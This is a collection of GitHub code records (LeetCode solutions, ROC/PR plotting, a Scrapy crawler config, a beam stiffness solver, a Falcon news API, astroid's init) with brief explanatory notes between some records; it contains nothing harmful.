open('utils_data/cluster/CaCao_map50_dict_07.json', 
'w'))\n\n","repo_name":"Yuqifan1117/CaCao","sub_path":"adaptive_cluster.py","file_name":"adaptive_cluster.py","file_ext":"py","file_size_in_byte":16745,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"8"}
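The `evaluate_func`/`monte_carlo` pair in the clustering record above sweeps the candidate k values and compares SSE (elbow), silhouette, and Calinski-Harabasz scores, computing the SSE with a hand-written per-sample loop. scikit-learn's KMeans already exposes that sum as `inertia_`, so the sweep can be written more compactly; a sketch under that assumption (function name is hypothetical):

from sklearn.cluster import KMeans
from sklearn import metrics

def sweep_k(features, k_values):
    # Fit one KMeans per candidate k and collect the three model-selection scores.
    results = []
    for k in k_values:
        km = KMeans(n_clusters=k, n_init=10).fit(features)
        results.append({
            'k': k,
            'sse': km.inertia_,  # same quantity the record sums via SSE_clu
            'silhouette': metrics.silhouette_score(features, km.labels_),
            'ch': metrics.calinski_harabasz_score(features, km.labels_),
        })
    return results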
+{"seq_id":"73360824260","text":"#\n# @lc app=leetcode.cn id=415 lang=python3\n#\n# [415] add-strings\n#\nclass Solution:\n def addStrings(self, num1: str, num2: str) -> str:\n idx1=len(num1)-1\n idx2=len(num2)-1\n res=[]\n borrow=0\n while idx1>=0 and idx2>=0:\n tmp=int(num1[idx1])+int(num2[idx2])+borrow\n borrow=0\n idx1-=1\n idx2-=1\n if tmp>9:\n tmp-=10\n borrow=1\n res.append(str(tmp))\n while idx1>=0:\n tmp=int(num1[idx1])+borrow\n borrow=0\n idx1-=1\n if tmp>9:\n tmp-=10\n borrow=1\n res.append(str(tmp))\n while idx2>=0:\n tmp=int(num2[idx2])+borrow\n borrow=0\n idx2-=1\n if tmp>9:\n tmp-=10\n borrow=1\n res.append(str(tmp))\n if borrow==1:\n res.append(str(borrow))\n return ''.join(res[::-1])\n# @lc code=end","repo_name":"zhanjw/leetcode","sub_path":"codes_auto/415.add-strings.py","file_name":"415.add-strings.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"19272429052","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 17 21:56:20 2018\n\n@author: hjh\n\"\"\"\nimport matplotlib.pyplot as plt \nimport os\n\ndef proba_sort(path, isMAG):\n xy_arr = []\n \n f1 = open(os.path.join(path, 'testPair1.txt'))\n f2 = open(os.path.join(path, 'testPair2.txt'))\n f3 = open(os.path.join(path, 'differentPair.txt'))\n \n sp = ':'\n if isMAG:\n sp = '\\t'\n \n for each in f1.readlines():\n xy_arr.append([float(each.strip().split(sp)[1]), 1])\n for each in f2.readlines():\n xy_arr.append([float(each.strip().split(sp)[1]), 1])\n for each in f3.readlines():\n xy_arr.append([float(each.strip().split(sp)[1]), 0])\n \n f1.close()\n f2.close()\n f3.close()\n \n xy_arr = sorted(xy_arr, key=lambda x : x[0], reverse=True)\n return xy_arr\n\n\ndef plot_roc(score_mag, score_twadn):\n xy_cor = [[0, 0]]\n pre_x = 0.0\n pre_y = 0.0\n for sc, label in score_mag:\n if label == 1:\n pre_y = pre_y + (1 / 90)\n else:\n pre_x = pre_x + (1 / 100)\n xy_cor.append([pre_x, pre_y])\n \n xy_arr_tw = [[0, 0]]\n pre_xt = 0.0\n pre_yt = 0.0\n for sc, label in score_twadn:\n if label == 1:\n pre_yt = pre_yt + (1 / 90)\n else:\n pre_xt = pre_xt + (1 / 100)\n xy_arr_tw.append([pre_xt, pre_yt])\n \n x_mag = [x[0] for x in xy_cor]\n y_mag = [y[1] for y in xy_cor]\n \n x_twa = [x[0] for x in xy_arr_tw]\n y_twa = [y[1] for y in xy_arr_tw]\n #print(xy_cor)\n print('AUROC DynaMAGNA++', under_curve(x_mag, y_mag))\n print('AUROC twadn', under_curve(x_twa, y_twa))\n plt.plot(x_mag, y_mag, color='r', label='DynaMAGNA++')\n plt.plot(x_twa, y_twa, color='g', label='twadn')\n # plt.title(\"ROC\")\n plt.xlabel(\"False Positive Rate\", fontsize='x-large')\n plt.ylabel(\"True Positive Rate\", fontsize='x-large')\n plt.legend(loc=8, fontsize='large')\n plt.show()\n \n \ndef plot_pr(score_mag, score_twadn):\n p_mag = []\n r_mag = []\n p_twadn = []\n r_twadn = []\n for i in range(190):\n tp_mag = 0.0\n fp_mag = 0.0\n tp_twa = 0.0\n fp_twa = 0.0\n for j in range(i+1):\n if score_mag[j][1] == 1:\n tp_mag += 1\n else:\n fp_mag += 1\n if score_twa[j][1] == 1:\n tp_twa += 1\n else:\n fp_twa += 1\n p_mag.append(tp_mag / (tp_mag + fp_mag))\n r_mag.append(tp_mag / 90.0)\n p_twadn.append(tp_twa / (tp_twa + fp_twa))\n r_twadn.append(tp_twa / 90.0)\n \n print('AUPR DynaMAGNA++', under_curve(r_mag, p_mag))\n print('AUPR twadn', under_curve(r_twadn, p_twadn))\n print('f1 DynaMAGNA++', get_F1(r_mag, p_mag))\n print('f1 twadn', get_F1(r_twadn, p_twadn))\n # f1_max_mag, f1_cross_mag = get_F1(r_mag, p_mag)\n # f1_max_twa, f1_cross_twa = get_F1(r_twadn, p_twadn)\n \n \n plt.plot(r_mag, p_mag, color='r', label='DynaMAGNA++')\n plt.plot(r_twadn, p_twadn, color='g', label='twadn')\n plt.xlabel(\"Recall\", fontsize='x-large')\n plt.ylabel(\"Precision\", fontsize='x-large')\n plt.legend(loc=8, fontsize='large')\n plt.show()\n \n\ndef under_curve(x, y):\n m = len(x)\n sqr = 0.0\n for i in range(1, m):\n sqr += 0.5 * (x[i] - x[i-1]) * (y[i] + y[i-1])\n return sqr\n \n\ndef get_F1(r, p):\n f1_max = 0.0\n f1_cross = 0.0\n dist = 1.0\n m = len(r)\n for i in range(m):\n f1 = 2 * r[i] * p[i] / (r[i] + p[i])\n if f1 > f1_max:\n f1_max = f1\n if abs(p[i] - r[i]) < dist:\n f1_cross = f1\n dist = abs(p[i] - r[i])\n # print(i, f1)\n return f1_max, f1_cross\n \n \nif __name__ == '__main__':\n pathMAGNA = '/home/hjh/桌面/workshop/my_study/lastNetCoffee2/DynaMAGNA++/CLI/testPair'\n pathTWADN = '/home/hjh/桌面/workshop/my_study/lastNetCoffee2/twadn/testdata/test'\n score_mag = proba_sort(pathMAGNA, True)\n 
score_twa = proba_sort(pathTWADN, False)\n #print(len(score_mag))\n plot_roc(score_mag, score_twa)\n plot_pr(score_mag, score_twa)","repo_name":"jhu99/twadn","sub_path":"testdata/py/py/roc_pr_plot.py","file_name":"roc_pr_plot.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"}
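The plotting script above builds its ROC and PR curves by hand, with the class sizes (90 positives, 100 negatives) hard-coded into the step increments. scikit-learn derives the same curves and areas directly from the (score, label) pairs, which removes those magic numbers; a sketch assuming the pair list produced by `proba_sort` (the function name here is an assumption):

import numpy as np
from sklearn.metrics import roc_curve, precision_recall_curve, auc

def curve_areas(scored_pairs):
    # scored_pairs: [(score, label), ...] as returned by proba_sort().
    scores = np.array([s for s, _ in scored_pairs])
    labels = np.array([l for _, l in scored_pairs])
    fpr, tpr, _ = roc_curve(labels, scores)
    precision, recall, _ = precision_recall_curve(labels, scores)
    # auc() accepts monotonic x in either direction, so decreasing recall is fine.
    return auc(fpr, tpr), auc(recall, precision)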
+{"seq_id":"14316093383","text":"# -*- coding: utf-8 -*-\n\n# Scrapy settings for qcwy project\n#\n# For simplicity, this file contains only settings considered important or\n# commonly used. You can find more settings consulting the documentation:\n#\n# http://doc.scrapy.org/en/latest/topics/settings.html\n# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html\n# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html\n\nBOT_NAME = 'qcwy'\n\nSPIDER_MODULES = ['qcwy.spiders']\nNEWSPIDER_MODULE = 'qcwy.spiders'\n\n#DUPEFILTER_DEBUG = 'True'\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n#USER_AGENT = 'qcwy (+http://www.yourdomain.com)'\n\n# Configure maximum concurrent requests performed by Scrapy (default: 16)\n#CONCURRENT_REQUESTS=32\n\n# Configure a delay for requests for the same website (default: 0)\n# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay\n# See also autothrottle settings and docs\n#DOWNLOAD_DELAY=3\n# The download delay setting will honor only one of:\n#CONCURRENT_REQUESTS_PER_DOMAIN=16\n#CONCURRENT_REQUESTS_PER_IP=16\n\n# Disable cookies (enabled by default)\n#COOKIES_ENABLED=False\n\n# Disable Telnet Console (enabled by default)\n#TELNETCONSOLE_ENABLED=False\n\n# Override the default request headers:\n#DEFAULT_REQUEST_HEADERS = {\n# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n# 'Accept-Language': 'en',\n#}\n\n# Enable or disable spider middlewares\n# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html\n#SPIDER_MIDDLEWARES = {\n# 'qcwy.middlewares.MyCustomSpiderMiddleware': 543,\n#}\n\n# Enable or disable downloader middlewares\n# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html\n#DOWNLOADER_MIDDLEWARES = {\n# 'qcwy.middlewares.MyCustomDownloaderMiddleware': 543,\n#}\n\n# Enable or disable extensions\n# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html\n#EXTENSIONS = {\n# 'scrapy.telnet.TelnetConsole': None,\n#}\n\n# Configure item pipelines\n# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html\nITEM_PIPELINES = {\n 'qcwy.pipelines.QcwyJsonPipeline': 300,\n\t'qcwy.pipelines.QcwyMySQLPipeline': 800,\n}\n\n# Enable and configure the AutoThrottle extension (disabled by default)\n# See http://doc.scrapy.org/en/latest/topics/autothrottle.html\n# NOTE: AutoThrottle will honour the standard settings for concurrency and delay\n#AUTOTHROTTLE_ENABLED=True\n# The initial download delay\n#AUTOTHROTTLE_START_DELAY=5\n# The maximum download delay to be set in case of high latencies\n#AUTOTHROTTLE_MAX_DELAY=60\n# Enable showing throttling stats for every response received:\n#AUTOTHROTTLE_DEBUG=False\n\n# Enable and configure HTTP caching (disabled by default)\n# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings\n#HTTPCACHE_ENABLED=True\n#HTTPCACHE_EXPIRATION_SECS=0\n#HTTPCACHE_DIR='httpcache'\n#HTTPCACHE_IGNORE_HTTP_CODES=[]\n#HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'\n\n#搜索参数\n#同一属性两个条件联合用逗号分隔\nKEYWORD = {\n 'jobarea': '020000,030200,010000,040000,080200,00', #北上广深杭\n 'industrytype': '00', #32表示互联网,42银行,03证券/金融,43保险, 00全体\n 'keyword': '数据分析',\n 'workyear': '99', #99表示所有,01无经验,02一到三年,03三到五年,04五到十年\n }\n\n\n#所需要的搜索的技能表,key为技能名,value为对应正则表达式\nSKILLS = {\n 'has_excel': 'excel',\n 'has_mining': u'数据挖掘',\n 'has_python': 'python',\n 'has_hadoop': 'Hadoop',\n 'has_hive': 'HIVE',\n 
'has_sql': 'SQL',\n    'has_sas': 'SAS',\n    'has_spss': 'SPSS',\n    'has_java': 'java',\n    'has_GA': 'Google Analytics|GA',\n    'has_crawler': u'爬虫',\n    'has_ETL': u'数据仓库|ETL',\n    'has_R': r'\\bR(语言)?\\b',\n    'has_mlearning': u'机械学习|scikit',\n    'has_modeling': u'建模|数学模型',\n    'has_algorithm': u'算法',\n    'has_visialize': u'可视化|tableau'\n    }\n    \n# Enter your login username and password\nFORMDATA = {'username': 'name', 'userpwd': 'password'}\n\n# Database name and table name\nDATABASE = {\n    'user': 'root', \n    'password': 'password', \n    'host': 'localhost',\n    'name': 'job_project',\n    'table': 'alljobs'\n    }","repo_name":"yiqiyu/webspider","sub_path":"qcwy/qcwy/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
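The `SKILLS` table in the settings record above maps database column names to regular expressions, but the settings file never shows how they are applied. A sketch of the matching step presumably done in the spider, with case-insensitive search; the function name and the 0/1 flag convention are assumptions:

import re

def extract_skills(description, skills):
    # skills: the SKILLS dict from settings; returns {column_name: 0 or 1}.
    return {
        name: int(bool(re.search(pattern, description, flags=re.IGNORECASE)))
        for name, pattern in skills.items()
    }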
+{"seq_id":"23629911630","text":"import sys\nfrom md import *\nsys.stdin = open('input.txt')\n###############################################\nT = int(input())\nfor tc in range(1, T + 1):\n word = list(input())\n # 스택이 아닌 풀이과정\n # while True:\n # delete = []\n # for i in range(len_(word)-1):\n # if word[i] == word[i + 1]:\n # delete.append(i)\n # break\n # if len_(delete) == 0:\n # break\n #\n # for i in delete:\n # word.remove(word[i])\n # word.remove(word[i])\n #\n # print(f'#{tc}', len_(word))\n\n # 스택 빈 리스트 만들기\n stack = []\n for i in word:\n # 스택에 하나씩 넣는다\n stack += i\n # 스택의 길이가 2이상이고 맨 뒤 두개가 같다면\n if len_(stack) > 1 and stack[-1] == stack[-2]:\n # 맨 뒤 두개를 삭제한다.\n stack.pop()\n stack.pop()\n\n print(f'#{tc}', len_(stack))","repo_name":"chahyeoncheol/Algorithm","sub_path":"230809/4873. 반복문자 지우기.py","file_name":"4873. 반복문자 지우기.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"18927901922","text":"#Beam Solver using stiffness matrix method\r\n#Unyielding support condition\r\n#Unit=kN,m\r\n#Where, K=Pj-Pl(PL=member reaction due to given load, Pj=given joint load)\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport pandas as pd\r\nfrom PyQt5 import QtWidgets\r\n \r\n#%% Data Input\r\n\r\n\r\npath=os.getcwd()\r\ndata=pd.read_csv(path+'\\\\input.csv')\r\nNODES=data.Nodes.dropna()\r\nX=data.x.dropna()\r\nY=data.y.dropna()\r\nP_joint=data.P_joint.dropna()\r\nM_joint=data.M_joint.dropna()\r\nL_all=data.L.dropna()\r\nEI_all=data.EI.dropna()\r\n\r\n#formatting data input\r\nN_i=data.node_i.dropna()\r\nN_j=data.node_j.dropna()\r\ndy=data.defln_y.dropna()\r\nrot=data.rot.dropna()\r\nM_i=data.FEM_frd.dropna()\r\nM_j=data.FEM_back.dropna()\r\nR_i=data.R_i.dropna()\r\nR_j=data.R_j.dropna()\r\n\r\n\r\n#%%Formulation of global stiffness matrix\r\nl=len(NODES)\r\nelem=len(N_i)\r\ndof_total=4*l\r\nK_elem=np.zeros([4,4])\r\nn=elem*2+2\r\nK_global=np.zeros([n,n])\r\nK_all=[]\r\nfor i in range(0,elem):\r\n K=[]\r\n EI=EI_all[i]\r\n L=L_all[i]\r\n K.append(12*EI/L**3)\r\n K.append(6*EI/L**2)\r\n K.append(-12*EI/L**3)\r\n K.append(6*EI/L**2)\r\n K.append(6*EI/L**2)\r\n K.append(4*EI/L)\r\n K.append(-6*EI/L**2)\r\n K.append(2*EI/L)\r\n K.append(-12*EI/L**3)\r\n K.append(-6*EI/L**2)\r\n K.append(12*EI/L**3)\r\n K.append(-6*EI/L**2)\r\n K.append(6*EI/L**2)\r\n K.append(2*EI/L)\r\n K.append(-6*EI/L**2)\r\n K.append(4*EI/L)\r\n\r\n #making element stiffness matrix of size equal to dummy global matrix by padding\r\n K=np.array(K)\r\n K=K.reshape(4,4)\r\n #Printing inividual stiffness matrix\r\n print(\"\\n<<<<>>>>\\n\")\r\n print(K)\r\n K=np.pad(K,(i*2,(n-4)-i*2))\r\n #storing matrix value in dynamic variable: K1, K2, K3......\r\n globals()[f\"K{i+1}\"] = K\r\n #Creating Global Matrix\r\n K_global=K_global+K\r\n\r\n#%%Connectivity check of members\r\n#Computing total FEM and member reactions at each ends\r\nP=[]\r\nfor i in NODES:\r\n FEM_total=0\r\n R_total=0\r\n a_i=N_i.index[N_i==i].tolist()\r\n a_j=N_j.index[N_j==i].tolist()\r\n for j in a_i:\r\n FEM_total=FEM_total+M_i[j]\r\n R_total=R_total+R_i[j]\r\n for k in a_j:\r\n FEM_total=FEM_total+M_j[k]\r\n R_total=R_total+R_j[k]\r\n P.append(R_total)\r\n P.append(-1*FEM_total)\r\n \r\n #Individual nodal loads eg. 
FEM_A, FEM_B,....\r\n globals()[f\"FEM_{i}\"]=FEM_total\r\n globals()[f\"R_{i}\"]=R_total\r\nP=np.array(P)\r\n\r\n#%%Formatting given joint load matrix\r\nP_JOINT=[] #(Given joint load)\r\nfor i in range(0,len(NODES)):\r\n P_JOINT.append(float(P_joint[i]))\r\n P_JOINT.append(float(-1*M_joint[i]))\r\n\r\nP_JOINT=np.array(P_JOINT)\r\n#Combined load of given joint load and member reaction (PL_Pj)\r\nP=P_JOINT-P #P=matrix due to given loading condition\r\n #P_JOINT= given joint load\r\n \r\n#%%Droping rows and columns having 0 deflection and rotation\r\n#Merging and ordering\r\ndelta=[]\r\nfor i in range(0,len(NODES)):\r\n delta.append(float(dy[i]))\r\n delta.append((rot[i]))\r\ndelta=pd.Series(delta)\r\n#identifying row index having no deflection and rotation\r\nfor i in range(0,n):\r\n drop_me=delta.index[delta!=\"x\"].tolist()\r\n\r\n#Dropping cells\r\nk_global=np.delete(K_global,drop_me,axis=0)\r\nk_global=np.delete(k_global,drop_me,axis=1)\r\nrxn=np.delete(P,drop_me)\r\n\r\n#%%Calculating Unknown deflections and rotations\r\ninv_k=np.linalg.inv(k_global) #inverse of global stiffness matrix\r\ndefln=np.matmul(inv_k,rxn)\r\n\r\n#Overwriting unknown deflection 'x' with computed values\r\nfor i in range(0,n):\r\n ind_unknown=delta.index[delta==\"x\"].tolist()\r\nfor i in range(0,len(ind_unknown)):\r\n delta[ind_unknown[i]]=defln[i]\r\ndelta=np.array(delta)\r\ndelta=delta.astype(float)\r\n\r\n#Final reaction calculation\r\nR=np.matmul(K_global,delta)-P\r\nR=np.round(R,3)\r\n\r\nResult=pd.DataFrame({\"Deflection\":delta,\r\n \"Reaction\":R})\r\nprint(\"\\n<<<<<>>>>>\\n\")\r\nprint(K_global)\r\n\r\nprint(\"\\n<<<<<>>>>>\\n\")\r\nprint(Result)\r\n","repo_name":"santoshkatuwal/Direct-stiffness-method-Beam-","sub_path":"Beam Calculator.py","file_name":"Beam Calculator.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
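The beam solver above assembles the global stiffness matrix by zero-padding each 4x4 element matrix out to full size with `np.pad`, which only works when members are numbered consecutively along the beam. The more general pattern scatters each element matrix into the global one through DOF index arrays; a sketch with the same 2-DOF-per-node (deflection, rotation) convention (function names are assumptions):

import numpy as np

def element_stiffness(EI, L):
    # Standard Euler-Bernoulli beam element, DOFs (v_i, theta_i, v_j, theta_j).
    return (EI / L**3) * np.array([
        [ 12,     6*L,   -12,     6*L  ],
        [  6*L,  4*L**2,  -6*L,  2*L**2],
        [-12,    -6*L,    12,    -6*L  ],
        [  6*L,  2*L**2,  -6*L,  4*L**2],
    ])

def assemble_global(n_nodes, elements):
    # elements: iterable of (node_i, node_j, EI, L) with 0-indexed node numbers.
    K = np.zeros((2 * n_nodes, 2 * n_nodes))
    for node_i, node_j, EI, L in elements:
        dof = [2 * node_i, 2 * node_i + 1, 2 * node_j, 2 * node_j + 1]
        K[np.ix_(dof, dof)] += element_stiffness(EI, L)
    return K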
+{"seq_id":"33215629952","text":"import pandas as pd\nfrom pandas import np, DataFrame\nfrom seaborn import load_dataset\nfrom sklearn.datasets import load_iris\nfrom sklearn.impute import SimpleImputer\n\n\nclass MLWarmup:\n def getIrisDataset(self):\n iris = load_iris()\n index = 0\n while(index < len(iris['target'])):\n print(iris['data'][index], iris['target'][index], iris['target_names'][iris['target'][index]],\n sep=' | ')\n index += 1\n def getPlanetsDataset(self):\n planets_df = load_dataset(\"planets\")\n print(planets_df)\n column_names = ['method', 'number', 'orbital_period', 'mass', 'distance', 'year']\n # ilość wartości pustych w kolumnach\n print(planets_df.isnull().sum())\n # usuń wszystkie kolumny zawierające więcej niż połowę wartości pustych - 1035\n half_dataset_no = int(len(planets_df)/2)\n planets_df1 = planets_df\n for c in column_names:\n if(planets_df[c].isnull().sum() > half_dataset_no):\n planets_df1 = planets_df1.drop(c,axis=1)\n print(planets_df1.isnull().sum())\n # usuń wszystkie te wiesze kóre zawierają ponad połowę wartości pustych -> planets_df\n planets_df2 = planets_df\n planets_df2 = planets_df2.dropna(thresh=4)\n print(planets_df2)\n # uzupełnianie pustych danych\n imp = SimpleImputer(missing_values=np.nan, strategy='most_frequent')\n planets_df3 = imp.fit_transform(planets_df)\n planets_df3 = DataFrame(planets_df3, columns=list(planets_df.columns))\n print(planets_df3.isnull().sum())\n print(planets_df3)\n\nml = MLWarmup()\n# ml.getIrisDataset()\nml.getPlanetsDataset()","repo_name":"mgorzalczany/Machine_Learning_Project","sub_path":"venv/ML_script.py","file_name":"ML_script.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"28440045888","text":"from stmt_run import STMT\nimport torch\nimport random\nimport numpy as np\nimport argparse\nimport time\nimport pdb\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"--mode\",\n help=\"train_single, finetune_with_multi, test_multi_ensemble, test_multi, test_single\")\n\nparser.add_argument(\"--seed\", default=65, help=\"Please choose a seed, you can either use 123, 65, 413\")\n# For training\nparser.add_argument(\"--img_dir\", default=\"../Blood_data/train\")\nparser.add_argument(\"--csv_path\", default=\"../Blood_data/train.csv\")\nparser.add_argument(\"--checkpoint_path\", default=\"../model\", help=\"Please give a model saving path.\")\nparser.add_argument(\"--model_name\", default=\"test\", help=\"Please give a model name for saving, i.e.'Resnet18_single'\") \n\nparser.add_argument(\"--model_dir\", default=\"../model/ann_res_seed65_9.pth\")\nparser.add_argument(\"--validation_split\", default=False, help=\"True for training whole data, False for split validation set\")\nparser.add_argument(\"--validation_only\", default=False, help=\"True for only see validation score of whole training data, without training\")\nparser.add_argument(\"--model_which\", default=\"resnet34\")\n\n# For ensemble with multi inference\nparser.add_argument(\"--model1\", default=\"../model1.pth?dl=1\")\nparser.add_argument(\"--model2\", default=\"../model2.pth?dl=1\")\nparser.add_argument(\"--model3\", default=\"../model3.pth?dl=1\")\nparser.add_argument(\"--output_csv_name\", default=\"test.csv\")\n\nparser.add_argument(\"--test_dir\", default=\"../Blood_data/test\")\nargs = parser.parse_args()\n\n\n# fix random seeds for reproducibility\nSEED = int(args.seed)\ntorch.manual_seed(SEED)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\nrandom.seed(SEED)\nnp.random.seed(SEED)\n\nstmt_obj = STMT(args)\nif args.mode=='train_single':\n if args.validation_only:\n print(\"Single Validating ...\")\n else:\n print(\"Single Training ...\")\n stmt_obj.train_single(validation_split=args.validation_split, validation_only=args.validation_only)\n\nelif args.mode=='finetune_with_multi':\n if args.validation_only:\n print(\"Validating on multi images after finetuning...\")\n else:\n print(\"Finetuning with multi images ...\")\n stmt_obj.batch_size = 12 # the dataset of multi images return 5 images\n stmt_obj.lr = 1e-6\n stmt_obj.finetune_with_multi(validation_split=args.validation_split, validation_only=args.validation_only)\n\nelif args.mode=='test_multi_ensemble':\n print(f'Start multi-image-ensemble, testing on {args.test_dir}')\n st = time.time()\n stmt_obj.test_ensemble()\n ed = time.time()\n print(f\"Total run time = {ed-st} seconds.\")\n\nelif args.mode=='test_multi':\n print(f'Start multi-image test, testing on {args.test_dir}')\n st = time.time()\n stmt_obj.test(image_mode=\"multi\")\n ed = time.time()\n print(f\"Total run time = {ed-st} seconds.\")\n\nelif args.mode=='test_single':\n print(f'Start single-image test, testing on {args.test_dir}')\n st = time.time()\n stmt_obj.test(image_mode=\"single\")\n ed = time.time()\n print(f\"Total run time = {ed-st} seconds.\")\n\n","repo_name":"PengWenChen/DLCV-Fall-2020","sub_path":"Final-PengWenChen/Single_Train_Multi_Test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"38815176832","text":"from model.publisher import Publishers\nfrom model.models import Articles\nfrom model.params import ArticlesParams\nfrom model.params import NewsParams\nfrom model.params import SearchParams\nimport falcon\n\n\nclass PublishersResource:\n def __init__(self):\n self.publishers = Publishers()\n\n def on_get(self, req, resp):\n resp.body = self.publishers.load_publishers()\n\n\nclass NewsResource:\n def __init__(self):\n self.articles = Articles()\n\n def on_get(self, req, resp, publisher_code=None):\n try:\n resp.body = self.articles.load_modified_news(NewsParams.from_req(req, publisher_code))\n except ValueError as e:\n raise falcon.HTTPBadRequest('bad request', 'invalid query: ' + str(e))\n\n\nclass SearchResource:\n def __init__(self):\n self.articles = Articles()\n\n def on_get(self, req, resp):\n try:\n resp.body = self.articles.load_modified_news(SearchParams.from_req(req))\n except ValueError as e:\n raise falcon.HTTPBadRequest('bad request', 'invalid query: ' + str(e))\n\n\nclass ArticleResource:\n def __init__(self):\n self.articles = Articles()\n\n def on_get(self, req, resp, news_id):\n try:\n resp.body = self.articles.load_article_history(news_id, ArticlesParams.from_req(req))\n except ValueError as e:\n raise falcon.HTTPBadRequest('bad request', 'invalid query: ' + str(e))\n\n\napp = falcon.API()\npublishers = PublishersResource()\napp.add_route('/api/publishers', publishers)\nnews = NewsResource()\napp.add_route('/api/news', news)\napp.add_route('/api/publisher/{publisher_code}/news', news)\nsearch = SearchResource()\napp.add_route('/api/search/news', search)\narticle = ArticleResource()\napp.add_route('/api/news/{news_id}', article)\n","repo_name":"code4hk/NewsdiffHK-Backend","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"8"}
+{"seq_id":"35531744000","text":"import enum\nimport itertools\nimport os\nfrom importlib import import_module\nfrom pathlib import Path\n\nimport wrapt\n\nfrom .__pkginfo__ import __version__, version\n\n_Context = enum.Enum(\"Context\", \"Load Store Del\")\nLoad = _Context.Load\nStore = _Context.Store\nDel = _Context.Del\ndel _Context\n\n\n# WARNING: internal imports order matters !\n# pylint: disable=wrong-import-order,wrong-import-position,redefined-builtin\n\n# make all exception classes accessible from astroid package\nfrom astroid.exceptions import *\n\n# make all node classes accessible from astroid package\nfrom astroid.nodes import *\n\n# trigger extra monkey-patching\nfrom astroid import inference\n\n# more stuff available\nfrom astroid import raw_building\nfrom astroid.bases import BaseInstance, Instance, BoundMethod, UnboundMethod\nfrom astroid.node_classes import are_exclusive, unpack_infer\nfrom astroid.scoped_nodes import builtin_lookup\nfrom astroid.builder import parse, extract_node\nfrom astroid.util import Uninferable\n\n# make a manager instance (borg) accessible from astroid package\nfrom astroid.manager import AstroidManager\n\nMANAGER = AstroidManager()\ndel AstroidManager\n\n# transform utilities (filters and decorator)\n\n\n# pylint: disable=dangerous-default-value\n@wrapt.decorator\ndef _inference_tip_cached(func, instance, args, kwargs, _cache={}):\n \"\"\"Cache decorator used for inference tips\"\"\"\n node = args[0]\n try:\n return iter(_cache[func, node])\n except KeyError:\n result = func(*args, **kwargs)\n # Need to keep an iterator around\n original, copy = itertools.tee(result)\n _cache[func, node] = list(copy)\n return original\n\n\n# pylint: enable=dangerous-default-value\n\n\ndef inference_tip(infer_function, raise_on_overwrite=False):\n \"\"\"Given an instance specific inference function, return a function to be\n given to MANAGER.register_transform to set this inference function.\n\n :param bool raise_on_overwrite: Raise an `InferenceOverwriteError`\n if the inference tip will overwrite another. Used for debugging\n\n Typical usage\n\n .. sourcecode:: python\n\n MANAGER.register_transform(Call, inference_tip(infer_named_tuple),\n predicate)\n\n .. Note::\n\n Using an inference tip will override\n any previously set inference tip for the given\n node. Use a predicate in the transform to prevent\n excess overwrites.\n \"\"\"\n\n def transform(node, infer_function=infer_function):\n if (\n raise_on_overwrite\n and node._explicit_inference is not None\n and node._explicit_inference is not infer_function\n ):\n raise InferenceOverwriteError(\n \"Inference already set to {existing_inference}. 
\"\n \"Trying to overwrite with {new_inference} for {node}\".format(\n existing_inference=infer_function,\n new_inference=node._explicit_inference,\n node=node,\n )\n )\n # pylint: disable=no-value-for-parameter\n node._explicit_inference = _inference_tip_cached(infer_function)\n return node\n\n return transform\n\n\ndef register_module_extender(manager, module_name, get_extension_mod):\n def transform(node):\n extension_module = get_extension_mod()\n for name, objs in extension_module.locals.items():\n node.locals[name] = objs\n for obj in objs:\n if obj.parent is extension_module:\n obj.parent = node\n\n manager.register_transform(Module, transform, lambda n: n.name == module_name)\n\n\n# load brain plugins\nBRAIN_MODULES_DIR = Path(__file__).with_name(\"brain\")\nfor module in os.listdir(BRAIN_MODULES_DIR):\n if module.endswith(\".py\"):\n import_module(f\"astroid.brain.{module[:-3]}\")\n","repo_name":"ruchee/vimrc","sub_path":"vimfiles/bundle/vim-python/submodules/astroid/astroid/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","stars":415,"dataset":"github-code","pt":"8"}
